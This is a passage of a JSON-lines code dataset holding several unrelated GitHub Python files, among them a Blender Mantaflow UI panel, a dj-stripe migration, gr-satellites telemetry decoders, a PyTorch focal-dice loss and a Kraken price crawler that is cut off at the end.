domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n\n split = layout.split()\n split.enabled = not baking_any\n\n col = split.column(align=True)\n col.enabled = not domain.cache_baked_guiding\n col.label(text=\"Velocity source:\")\n 
col.prop(domain, \"guiding_source\", text=\"\")\n if domain.guiding_source == \"DOMAIN\":\n col.label(text=\"Guiding parent:\")\n col.prop(domain, \"guiding_parent\")\n\n col = split.column(align=True)\n col.enabled = not domain.cache_baked_data\n col.label(text=\"Simulation parameter:\")\n col.prop(domain, \"guiding_alpha\", text=\"Weight\")\n col.prop(domain, \"guiding_beta\", text=\"Size\")\n col.prop(domain, \"guiding_vel_factor\", text=\"Factor\")\n\n if domain.guiding_source == \"EFFECTOR\":\n split = layout.split()\n bake_incomplete = (domain.cache_frame_pause_guiding < domain.cache_frame_end)\n if domain.cache_baked_guiding and not domain.cache_baking_guiding and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_guiding\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_guiding\", text=\"Free\")\n elif not domain.cache_baked_guiding and domain.cache_baking_guiding:\n split.operator(\"manta.pause_bake\", text=\"Pause Guiding\")\n elif not domain.cache_baked_guiding and not domain.cache_baking_guiding:\n split.operator(\"manta.bake_guiding\", text=\"Bake Guiding\")\n else:\n split.operator(\"manta.free_guiding\", text=\"Free Guiding\")\n\nclass PHYSICS_PT_manta_groups(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Groups\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Flow Group:\")\n col.prop(domain, \"fluid_group\", text=\"\")\n\n #col.label(text=\"Effector Group:\")\n #col.prop(domain, \"effector_group\", text=\"\")\n\n col = split.column()\n col.label(text=\"Collision Group:\")\n col.prop(domain, \"collision_group\", text=\"\")\n\nclass PHYSICS_PT_manta_cache(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Cache\"\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n md = context.smoke\n domain = context.smoke.domain_settings\n\n split = layout.split()\n split.prop(domain, \"cache_directory\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(domain, \"cache_frame_start\")\n row.prop(domain, \"cache_frame_end\")\n\n split = layout.split()\n\n row = layout.row(align=True)\n row.label(text=\"Data file format:\")\n row.prop(domain, \"cache_data_format\", text=\"\")\n\n if md.domain_settings.smoke_domain_type in {'GAS'}:\n if domain.use_noise:\n row = layout.row(align=True)\n row.label(text=\"Noise file format:\")\n row.prop(domain, \"cache_noise_format\", text=\"\")\n\n if md.domain_settings.smoke_domain_type in {'LIQUID'}:\n # File format for all particle systemes (FLIP and secondary)\n row = layout.row(align=True)\n row.label(text=\"Particle file format:\")\n row.prop(domain, \"cache_particle_format\", text=\"\")\n\n if domain.use_mesh:\n row = layout.row(align=True)\n row.label(text=\"Mesh file format:\")\n row.prop(domain, \"cache_mesh_format\", text=\"\")\n\n row = layout.row()\n row.operator(\"manta.make_file\", text=\"Export Mantaflow Script\")\n\nclass PHYSICS_PT_manta_field_weights(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Field Weights\"\n bl_options = 
{'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n domain = context.smoke.domain_settings\n effector_weights_ui(self, context, domain.effector_weights, 'SMOKE')\n\nclass PHYSICS_PT_manta_display_settings(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Display Settings\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (not rd.use_game_engine) and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw(self, context):\n domain = context.smoke.domain_settings\n layout = self.layout\n\n layout.prop(domain, \"display_thickness\")\n\n layout.separator()\n layout.label(text=\"Slicing:\")\n layout.prop(domain, \"slice_method\")\n\n slice_method = domain.slice_method\n axis_slice_method = domain.axis_slice_method\n\n do_axis_slicing = (slice_method == 'AXIS_ALIGNED')\n do_full_slicing = (axis_slice_method == 'FULL')\n\n row = layout.row()\n row.enabled = do_axis_slicing\n row.prop(domain, \"axis_slice_method\")\n\n col = layout.column()\n col.enabled = not do_full_slicing and do_axis_slicing\n col.prop(domain, \"slice_axis\")\n col.prop(domain, \"slice_depth\")\n\n row = layout.row()\n row.enabled = do_full_slicing or not do_axis_slicing\n row.prop(domain, \"slice_per_voxel\")\n\n layout.separator()\n layout.label(text=\"Debug:\")\n layout.prop(domain, \"draw_velocity\")\n col = layout.column()\n col.enabled = domain.draw_velocity\n col.prop(domain, \"vector_draw_type\")\n col.prop(domain, \"vector_scale\")\n\n layout.separator()\n layout.label(text=\"Color Mapping:\")\n layout.prop(domain, \"use_color_ramp\")\n col = layout.column()\n col.enabled = domain.use_color_ramp\n col.prop(domain, \"coba_field\")\n col.template_color_ramp(domain, \"color_ramp\", expand=True)\n\nclasses = (\n MANTA_MT_presets,\n PHYSICS_PT_manta,\n PHYSICS_PT_manta_flow_source,\n PHYSICS_PT_manta_flow_advanced,\n PHYSICS_PT_manta_adaptive_domain,\n PHYSICS_PT_manta_quality,\n PHYSICS_PT_manta_noise,\n PHYSICS_PT_manta_mesh,\n PHYSICS_PT_manta_particles,\n PHYSICS_PT_manta_diffusion,\n PHYSICS_PT_manta_guiding,\n PHYSICS_PT_manta_groups,\n PHYSICS_PT_manta_cache,\n PHYSICS_PT_manta_field_weights,\n PHYSICS_PT_manta_display_settings,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n","repo_name":"hbcbh1999/BlenderMantaflow","sub_path":"release/scripts/startup/bl_ui/properties_physics_smoke.py","file_name":"properties_physics_smoke.py","file_ext":"py","file_size_in_byte":34345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"23963491094","text":"survey = [\"What is your name?\",\"What is your horoscope?\",\"What is your lucky number?\",\"What is your favorite ice cream flavor?\",\"What is your favorite food?\"]\r\nkey = [\"key1\", \"key2\", \"key3\", \"key4\", \"key5\"]\r\n\r\nfor i in range(len(survey)):\r\n key[i] = input(survey[i])\r\n\r\nanswers = {\r\n \"name\": key[0],\r\n \"horoscope\": key[1],\r\n \"lucky number\": key[2],\r\n \"favorite ice cream flavor\": key[3],\r\n \"favorite food\": key[4]\r\n}\r\n\r\nanswerKey = [\"key1\", \"key2\", \"key3\", \"key4\", \"key5\"]\r\n\r\nresults = {\r\n \"name\": answerKey[0],\r\n \"horoscope\": 
answerKey[1],\r\n \"lucky number\": answerKey[2],\r\n \"favorite ice cream flavor\": answerKey[3],\r\n \"favorite food\": answerKey[4]\r\n}\r\n\r\n\r\ny = \"true\"\r\nwhile y:\r\n ans = input(\"Would you like to take the survey again?\")\r\n\r\n if ans.lower() == \"no\":\r\n print(\"Sure, we will show you your answers!\")\r\n print (answers)\r\n break\r\n else:\r\n print(\"Sure, we will provide you the survey again!\")\r\n for i in range(len(survey)):\r\n answerKey[i] = input(survey[i])\r\n print ( answers, results)\r\n continue\r\n","repo_name":"td-dana/data","sub_path":"dictionarypt2.py","file_name":"dictionarypt2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25819354370","text":"from pandas import Series\nfrom pandas import DataFrame\n#1 Series对象创建与操作\nlist1=[1,2,3,4]\ntuple1=(5,6,7,8)\ndict1={\"wyh\":18,\"ww\":18}\nser1=Series(list1)\nser2=Series(tuple1,index=[3,1,2,4])\nser3=Series(dict1)\nprint(ser1,ser2,ser3)\n\n#2 DataFrame对象创建与操作\nobj={'name':['wyh','cx'],\n 'age':['20','18'],\n 'status':['student','student']}\ndf=DataFrame(obj)\ndf['gender']=['m','m']\ndel df['status']\nprint(df.head(),df.age,df.T)\n\n","repo_name":"OswaldZero/pythonLearning","sub_path":"da_pandas.py","file_name":"da_pandas.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9918240016","text":"from turtle import Turtle\nMOVEMENT = 20\n\nclass Paddle(Turtle):\n def __init__(self, start_position):\n super().__init__()\n self.penup()\n self.shape(\"square\")\n self.color(\"white\")\n self.shapesize(stretch_len=1, stretch_wid=5)\n self.speed(\"fastest\")\n self.goto(start_position)\n \n def go_up(self):\n self.goto(self.xcor(), self.ycor() + MOVEMENT)\n \n def go_down(self):\n self.goto(self.xcor(), self.ycor() - MOVEMENT)\n","repo_name":"amygurski/100-days-of-python","sub_path":"day-22-pong/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11156401187","text":"from pathlib import Path\n\nimport django.db.models.deletion\nfrom django.db import migrations\n\nimport djstripe.fields\n\n\ndef get_sql_for_connection(schema_editor, direction: str) -> str:\n \"\"\"\n Returns the vendor and the collection of SQL Statements depending on:\n\n 1. The SQL Engine\n 2. Direction of Migrations: forward or Backward\n \"\"\"\n vendor = schema_editor.connection.vendor\n # Construct Path to SQL\n file_path = Path(__file__).parent / \"sql\" / f\"migrate_{vendor}_{direction}.sql\"\n try:\n sql_statement = Path(file_path).read_text()\n except FileNotFoundError as error:\n # In case it's oracle or some other django supported db that we do not support yet.\n raise RuntimeError(\n f\"We currently do not support {vendor}. 
Please open an issue at https://github.com/dj-stripe/dj-stripe/issues/new?assignees=&labels=discussion&template=feature-or-enhancement-proposal.md&title= if you'd like it supported.\",\n ) from error\n return vendor, sql_statement\n\n\ndef forwards_func(apps, schema_editor):\n vendor, sql_statement = get_sql_for_connection(schema_editor, \"forward\")\n with schema_editor.connection.cursor() as cursor:\n if vendor == \"sqlite\":\n cursor.executescript(sql_statement)\n else:\n cursor.execute(sql_statement)\n\n\ndef reverse_func(apps, schema_editor):\n vendor, sql_statement = get_sql_for_connection(schema_editor, \"backward\")\n with schema_editor.connection.cursor() as cursor:\n if vendor == \"sqlite\":\n cursor.executescript(sql_statement)\n else:\n cursor.execute(sql_statement)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"djstripe\", \"0012_2_8\"),\n ]\n operations = [\n migrations.RunPython(forwards_func, reverse_func),\n migrations.AlterField(\n model_name=\"payout\",\n name=\"destination\",\n field=djstripe.fields.PaymentMethodForeignKey(\n null=True,\n on_delete=django.db.models.deletion.PROTECT,\n to=\"djstripe.djstripepaymentmethod\",\n ),\n ),\n ]\n","repo_name":"Hu-Wentao/dj-stripe","sub_path":"djstripe/migrations/0013_2_8a.py","file_name":"0013_2_8a.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"1660789861","text":"from unittest import TestCase\n\nfrom find_sale_in_wish_list.headless_chrome import HeadlessChrome\nfrom lambda_handler.notifier import get_kindle_books, on_event\nimport lambda_handler.director_of_system\nimport os\n\n\nclass TestNotifier(TestCase):\n\n def test_get_kindle_books(self):\n event = {\n 'wish_list_url': 'http://amzn.asia/4jy4esM',\n 'expired': 1545440835,\n 'user_id': '92676047-1ce7-4080-bd44-10e3fc63a16d',\n 'description': 'マンガ',\n 'threshold': {\n 'discount_rate': 20,\n 'points': 20\n }\n }\n try:\n headless_chrome = HeadlessChrome()\n get_kindle_books(event, headless_chrome)\n headless_chrome.driver.close()\n except:\n self.fail()\n\n\nclass TestDirectorOfSystem(TestCase):\n\n def test_lambda_handler(self):\n os.environ['NOTIFIER'] = 'sale-develop-Notifier-1LLOIPVQ8DQPF'\n event = {\n 'wish_list_url': 'http://amzn.asia/4jy4esM',\n 'expired': 1545440835,\n 'user_id': '92676047-1ce7-4080-bd44-10e3fc63a16d',\n 'description': 'マンガ',\n 'threshold': {\n 'discount_rate': 20,\n 'points': 20\n }\n }\n try:\n lambda_handler.director_of_system.invoke_lambda(event)\n except:\n self.fail()\n","repo_name":"homura10059/find_sale_in_wishlist","sub_path":"tests/test_lambda_handler.py","file_name":"test_lambda_handler.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15672383951","text":"'''Faça um programa que peça ao usuario uma palavra ou frase,e crie uma segunda string cujo conteudo é o inverso do informado'''\n\nnormal = input(\"palavra:\")\ninverso = \"\"\nfor c in normal:\n inverso = c + inverso\n\nprint(normal)\nprint(inverso)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"GuilhermeCostaLima/ALPC2","sub_path":"Strings/EXextra3.py","file_name":"EXextra3.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75329757127","text":"import argparse\nimport datetime as dt\nimport logging\nimport pathlib\nimport shlex\n\nfrom hashlib import sha256\n\nimport 
construct\nimport gnuradio as gr\nimport gnuradio.gr\nimport pmt\n\nfrom satellites import filereceiver as grs_filereceivers\nfrom satellites.components import datasinks as grs_datasinks\nfrom satellites.components.datasinks.file_receiver import file_receiver as GrsFileReceiver\nfrom satellites.core import gr_satellites_flowgraph as grs_flowgraph\nfrom satellites.filereceiver.filereceiver import File as GrsFile\nfrom satellites import telemetry as grs_tlm\n\nfrom sats_receiver import utils\nfrom sats_receiver.systems.satellites import telemetry as sr_tlm\nfrom sats_receiver.systems.satellites import filereceivers as sr_filereceivers\nfrom sats_receiver.systems.satellites import demodulators as sr_demod\n\n\nclass SatFlowgraph(grs_flowgraph):\n @classmethod\n def add_options(cls, parser, file=None, name=None, norad=None):\n super().add_options(parser, file, name, norad)\n\n data_options = parser.add_argument_group('data sink')\n TlmDecoder.add_options(data_options)\n for i in dir(grs_datasinks):\n if not (i.startswith('__') or i.endswith('__')):\n ds = getattr(grs_datasinks, i)\n if hasattr(ds, 'add_options'):\n ds.add_options(data_options)\n\n p_output = parser.add_argument_group('output')\n p_output.add_argument('--hexdump', action='store_true')\n\n def __init__(self, log, samp_rate=None, options=None,\n file=None, name=None, norad=None, tlm_decode=False, is_iq=True):\n self.log = log\n self.tlm_decode = tlm_decode\n self._demodulator_hooks['GFSK'] = sr_demod.GfskDemod\n self._demodulator_hooks['GMSK'] = sr_demod.GmskDemod\n\n if type(options) is str:\n p = argparse.ArgumentParser(prog=self.__class__.__name__,\n conflict_handler='resolve')\n self.add_options(p, file, name, norad)\n options = p.parse_args(shlex.split(options))\n\n super().__init__(file=file, name=name, norad=norad,\n samp_rate=samp_rate, options=options,\n iq=is_iq, grc_block=0)\n\n def _init_datasink(self, key, info):\n if 'decoder' in info:\n ds = getattr(grs_datasinks, info['decoder'])\n try:\n x = ds(options=self.options)\n except TypeError: # raised if ds doesn't have an options parameter\n x = ds()\n elif 'telemetry' in info:\n x = TlmDecoder(info['telemetry'], self.log, options=self.options, tlm_decode=self.tlm_decode)\n elif 'files' in info:\n x = FileReceiver(info['files'], verbose=False, options=self.options)\n elif 'image' in info:\n x = FileReceiver(info['image'], verbose=False, display=False, fullscreen=False, options=self.options)\n else:\n x = TlmDecoder('raw', self.log, options=self.options)\n\n self._datasinks[key] = x\n\n def _init_additional_datasinks(self):\n pass\n\n def get_files(self) -> dict[str, dict[str, GrsFile]]:\n return {k: v.get_files()\n for k, v in self._datasinks.items()}\n\n def clean(self):\n for ds in self._datasinks.values():\n ds.clean()\n\n\nclass TlmDecoder(gr.gr.basic_block):\n def __init__(self, dname: str, log: logging.Logger, options=None, tlm_decode=False):\n super().__init__(\n 'raw_receiver',\n in_sig=[],\n out_sig=[])\n self.message_port_register_in(pmt.intern('in'))\n self.set_msg_handler(pmt.intern('in'), self.handle_msg)\n\n self.fmt = getattr(grs_tlm, dname, None)\n if self.fmt is None and dname != 'raw':\n self.fmt = getattr(sr_tlm, dname)\n\n self.log = log\n self.dname = dname\n self.tlm_decode = tlm_decode\n self.out_dir = pathlib.Path(options.file_output_path)\n self._files: dict[str, GrsFile] = {}\n\n def handle_msg(self, msg_pmt):\n msg = pmt.cdr(msg_pmt)\n if not pmt.is_u8vector(msg):\n self.log.debug('TlmDecoder: Received invalid message type. 
Expected u8vector')\n return\n\n packet = bytes(pmt.u8vector_elements(msg))\n meta = pmt.car(msg_pmt)\n transmitter = pmt.dict_ref(meta, pmt.intern('transmitter'), pmt.PMT_NIL)\n if pmt.is_symbol(transmitter):\n transmitter = pmt.symbol_to_string(transmitter)\n else:\n transmitter = str(transmitter)\n\n fn_base = '_'.join((self.dname, transmitter, dt.datetime.now().isoformat(),\n sha256(packet).hexdigest()[:16])).replace(' ', '-').replace('.', ',')\n\n try:\n tlm = self.fmt.parse(packet)\n except construct.ConstructError as e:\n self.log.debug('TlmDecoder: Could not parse telemetry beacon: %s', e)\n return\n\n try:\n if not (tlm and self.fmt.build(tlm)):\n return\n except:\n return\n\n f = GrsFile((self.out_dir / fn_base).with_suffix('.bin'))\n f.f.write(packet)\n to_close = [f.f]\n f.size = len(packet)\n self._files[f.path.name] = f\n\n if self.tlm_decode:\n tlmf = GrsFile((self.out_dir / fn_base).with_suffix('.txt'))\n tlm = str(tlm)\n tlmf.f.write(tlm.encode('utf-8'))\n to_close.append(tlmf.f)\n tlmf.size = len(tlm)\n self._files[tlmf.path.name] = tlmf\n\n utils.close(*to_close)\n\n @classmethod\n def add_options(cls, parser):\n parser.add_argument('--file_output_path', default='.')\n\n def get_files(self):\n return self._files\n\n def clean(self):\n self._files = {}\n\n\nclass FileReceiver(GrsFileReceiver):\n def __init__(self, receiver, path=None, verbose=None,\n options=None, **kwargs):\n gr.gr.basic_block.__init__(\n self,\n 'file_receiver',\n in_sig=[],\n out_sig=[])\n if verbose is None:\n if options is not None:\n verbose = options.verbose_file_receiver\n else:\n raise ValueError(\n 'Must indicate verbose in function arguments or options')\n if path is None:\n if options is not None:\n path = options.file_output_path\n else:\n raise ValueError(\n 'Must indicate path in function arguments or options')\n self.message_port_register_in(pmt.intern('in'))\n self.set_msg_handler(pmt.intern('in'), self.handle_msg)\n\n x = getattr(grs_filereceivers, receiver, None)\n if x is None:\n x = getattr(sr_filereceivers, receiver)\n self.receiver = x(path, verbose, **kwargs)\n\n def get_files(self):\n return self.receiver._files\n\n def clean(self):\n self.receiver._files = {}\n","repo_name":"baskiton/sats-receiver","sub_path":"sats_receiver/systems/satellites/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71730412488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n找出列表中大写开头的(去除空格后)和int型,并按照原来的索引顺序返回新列表\n['Ha', 'World', 666, 8, 5, 'Python', u'Www']\n'''\n\nalist = ['Ha', ' hello', 'World ', 666, 8, 'de', '12', 5, 'Python', u'Www']\ncopy_list = alist[:]\n\n\ndef int_list(alist):\n item_index = dict()\n ret = dict()\n for index, item in enumerate(alist):\n item_index.update({item: index})\n # print (item_index)\n # 找出列表中大写开头的(去除空格后)和int型,并返回新列表\n int_list = [int(numstr) for numstr in [\n intnum for intnum in alist if isinstance(intnum, int)]] # int_str_list\n ret['item_index'] = item_index\n ret['int_list'] = int_list\n return ret\n# print (int_list)\n# print \"#######int_list\"\n\n\ndef filter_list(alist, int_item_dict):\n #[8, 5, 'World', 'Python']\n int_list = int_item_dict['int_list']\n for j in int_list:\n alist.remove(j)\n # print alist\n # [item for item in alist if item.strip().istitle()] #newlist\n # int元素和istitle元素组成新的列表\n int_list.extend([item for item in alist if item.strip().istitle()])\n return int_list\n\n\n\ndef 
sort_index_list(int_str_list, int_item_dict):\n index_list = []\n item_index = int_item_dict['item_index']\n # print item_index\n for key in int_str_list:\n index_list.append(item_index[key])\n sort_indexlist = sorted(index_list)\n return sort_indexlist\n\n\ndef int_and_stripstr(sort_indexlist,copy_list):\n ret = []\n for i in sort_indexlist:\n if isinstance(copy_list[i], int):\n ret.append(copy_list[i])\n elif isinstance(copy_list[i], basestring):\n ret.append(copy_list[i].strip())\n else:\n pass\n return ret\n\n\ndef main(alist):\n int_lists = int_list(alist)\n int_str_list = filter_list(alist, int_lists)\n sort_indexlist = sort_index_list(int_str_list, int_lists)\n ret = int_and_stripstr(sort_indexlist,copy_list)\n return ret\n\nif __name__ == '__main__':\n res = main(alist)\n print(res)","repo_name":"imoyao/code-snippets","sub_path":"codes/list_test/filter_int_and_str_item_list.py","file_name":"filter_int_and_str_item_list.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74247256969","text":"import os\nimport gzip\nimport cPickle as pickle\nimport shelve\n\nallchars = shelve.open('/home/zr/letters/allchars_dict2')\n\nTSEK_APPR_MEAN = 19.5 # Fudge -- for use with Nyinggyud in particular.\n\ndef load_pkl_page(pkl_path):\n if os.path.exists(pkl_path):\n fl = gzip.open(pkl_path)\n return pickle.Unpickler(fl).load()\n\ndef construct_content(info):\n content = []\n for i, char in enumerate(info[:-1]):\n content.append(allchars['label_chars'][char[2]])\n if info[i+1][0] == char[0] +1:\n content.append(u'\\n')\n elif info[i+1][3] - char[4] >= TSEK_APPR_MEAN *2:\n content.append(u' ')\n content.append(allchars['label_chars'][info[-1][2]])\n return ''.join(content)","repo_name":"zmr/namsel","sub_path":"utils_extra/page_construct.py","file_name":"page_construct.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"73319577608","text":"from typing import Optional, List\r\nfrom functools import partial\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn.modules.loss import _Loss\r\nfrom ._functional import focal_loss_with_logits\r\nfrom ._functional import soft_dice_score, to_tensor\r\nfrom .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE\r\n\r\nfrom . import base\r\nfrom . import functional as F_dice\r\nfrom ..base.modules import Activation\r\n\r\n__all__ = [\"FocalDiceLoss\"]\r\n\r\nclass FocalDiceLoss(_Loss):\r\n\r\n def __init__(\r\n self,\r\n mode: str,\r\n tradeoff: 0.5,\r\n # focal loss\r\n alpha: Optional[float] = None,\r\n gamma: Optional[float] = 2.,\r\n ignore_index: Optional[int] = None, \r\n reduction: Optional[str] = \"mean\",\r\n normalized: bool = False,\r\n reduced_threshold: Optional[float] = None,\r\n # dice loss\r\n eps=1., beta=1., activation=None, ignore_channels=None, **kwargs\r\n ):\r\n \"\"\"Compute Focal loss\r\n\r\n Args:\r\n mode: Loss mode 'binary', 'multiclass' or 'multilabel'\r\n alpha: Prior probability of having positive value in target.\r\n gamma: Power factor for dampening weight (focal strength).\r\n ignore_index: If not None, targets may contain values to be ignored.\r\n Target values equal to ignore_index will be ignored from loss computation.\r\n normalized: Compute normalized focal loss (https://arxiv.org/pdf/1909.07829.pdf).\r\n reduced_threshold: Switch to reduced focal loss. 
Note, when using this mode you should use `reduction=\"sum\"`.\r\n \r\n Shape\r\n - **y_pred** - torch.Tensor of shape (N, C, H, W)\r\n - **y_true** - torch.Tensor of shape (N, H, W) or (N, C, H, W)\r\n\r\n Reference\r\n https://github.com/BloodAxe/pytorch-toolbelt\r\n\r\n \"\"\"\r\n assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}\r\n super().__init__()\r\n\r\n self.mode = mode\r\n self.ignore_index = ignore_index\r\n self.focal_loss_fn = partial(\r\n focal_loss_with_logits,\r\n alpha=alpha,\r\n gamma=gamma,\r\n reduced_threshold=reduced_threshold,\r\n reduction=reduction,\r\n normalized=normalized,\r\n )\r\n\r\n self.eps = eps\r\n self.beta = beta\r\n self.activation = Activation(activation)\r\n self.ignore_channels = ignore_channels\r\n self.tradeoff = tradeoff\r\n\r\n def aggregate_loss(self, loss):\r\n return loss.mean()\r\n\r\n def compute_score(self, output, target, smooth=0.0, eps=1e-7, dims=None) -> torch.Tensor:\r\n return soft_dice_score(output, target, smooth, eps, dims)\r\n\r\n def forward(self, y_pred: torch.Tensor, y_true: torch.Tensor) -> torch.Tensor:\r\n\r\n y_pred_dice_loss = self.activation(y_pred)\r\n y_true_dice_loss = y_true\r\n\r\n dice_loss = 1 - F_dice.jaccard(\r\n y_pred_dice_loss, y_true_dice_loss,\r\n eps=self.eps,\r\n threshold=None,\r\n ignore_channels=self.ignore_channels,\r\n )\r\n\r\n if self.mode in {BINARY_MODE, MULTILABEL_MODE}:\r\n y_true = y_true.view(-1)\r\n y_pred = y_pred.view(-1)\r\n\r\n if self.ignore_index is not None:\r\n # Filter predictions with ignore label from loss computation\r\n not_ignored = y_true != self.ignore_index\r\n y_pred = y_pred[not_ignored]\r\n y_true = y_true[not_ignored]\r\n\r\n loss = self.focal_loss_fn(y_pred, y_true)\r\n\r\n elif self.mode == MULTICLASS_MODE:\r\n \r\n num_classes = y_pred.size(1)\r\n\r\n # dice loss\r\n\r\n loss = 0\r\n\r\n # Filter anchors with -1 label from loss computation\r\n if self.ignore_index is not None:\r\n not_ignored = y_true != self.ignore_index\r\n\r\n for cls in range(num_classes):\r\n #cls_y_true = (y_true == cls).long()\r\n cls_y_pred = y_pred[:, cls, ...]\r\n cls_y_true = y_true[:, cls, ...]\r\n\r\n if self.ignore_index is not None:\r\n cls_y_true = cls_y_true[not_ignored]\r\n cls_y_pred = cls_y_pred[not_ignored]\r\n\r\n loss = loss + self.tradeoff*self.focal_loss_fn(cls_y_pred, cls_y_true) + (1-self.tradeoff)*dice_loss\r\n\r\n return loss\r\n","repo_name":"thoang02/DL-for-biomedical-images","sub_path":"segmentation_models_pytorch/losses/focal_dice.py","file_name":"focal_dice.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29715286756","text":"import json\nfrom janome.tokenizer import Tokenizer\n\nimport numpy as np\nfrom scipy import stats\n\ndef main():\n with open('data.json', 'r', encoding='utf-8') as json_file:\n json_dict = json.load(json_file)\n texts = []\n for json_key in json_dict:\n texts.append(json_key['detail'].replace('\\n', ''))\n\n\n t = Tokenizer()\n\n result = list()\n for rank in range(len(texts)):\n kind = []\n text = t.tokenize(texts[rank],wakati=True)\n type = 0\n for word in text:\n if not word in kind:\n kind.append(word)\n type += 1\n result.append({'rank': rank + 1, 'type': type})\n\n # print('all: ' + str(all))\n # print('average: ' + str(all / len(texts)))\n\n first = np.empty(50)\n second = np.empty(50)\n\n for rank in range(50):\n first[rank:rank+1] = result[rank]['type']\n\n for index in range(50):\n second[index:index+1] = 
result[index + 50]['type']\n\n # print(first)\n # print(second)\n print(stats.ttest_ind(first, second))\n #Ttest_indResult(statistic=0.23367427377675823, pvalue=0.8157252926627823)\n # -> 有意義とはいえない。\n #\nif __name__ == '__main__':\n main()\n","repo_name":"mitsumizo/python_analisis","sub_path":"analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2737518953","text":"\nfrom src.core.services.cities.contract import CityService\nfrom src.core.services.cities.contract.CityRepository import CityRepository\nfrom src.infrastructure.persistence import DBSession\nfrom src.infrastructure.persistence.UnitOfWork import UnitOfWork\n\n\nclass CityAPPService(CityService.CityService):\n \"\"\"\n This class is responsible for creating a new City\n \"\"\"\n\n def __init__(self, repository: CityRepository, unitOfWork: UnitOfWork):\n self.repository = repository\n self.unitOfWork = unitOfWork\n\n def add(self, city, province_id):\n with self.unitOfWork as uow:\n if self.repository.exits_name(city, province_id) is False:\n city_model = self.repository.save(city, province_id)\n uow.session.add(city_model)\n uow.session.commit()\n uow.session.refresh(city_model)\n id = city_model.city_id\n uow.session.close()\n return id\n else:\n raise Exception(\"City %s already exists\" % city)\n\n def get(self, city_id):\n return self.repository.get(city_id)\n","repo_name":"fardad2222/Clean-Architecture","sub_path":"src/core/services/cities/CityAppService.py","file_name":"CityAppService.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26681744355","text":"def api():\n from . import load_api_spec\n return load_api_spec('crawlers/kraken.yaml')\n\ndef get_pair_ohlc(pair, metrics, frequency, begin, end):\n global kraken\n if type(metrics) is list:\n metrics = ','.join(metrics)\n import requests\n resp = requests.get(api().ohlc_data(assets=pair, metrics=metrics, frequency=frequency, since=0))\n rj = resp.json()\n result = rj['data']\n import time\n if 'next_page_url' in rj:\n while True:\n time.sleep(0.5)\n resp = requests.get(rj['next_page_url'])\n rj = resp.json()\n result += rj['data']\n if not 'next_page_url' in rj:\n break\n return result\n\n\ndef get_bootstrap_data(symbol, currency):\n from . import bootstrap_index, load_transformer\n _convert_map = {\n 'btc':'xbt',\n 'doge':'xdg'\n }\n if symbol in _convert_map:\n symbol = _convert_map[symbol]\n if currency in 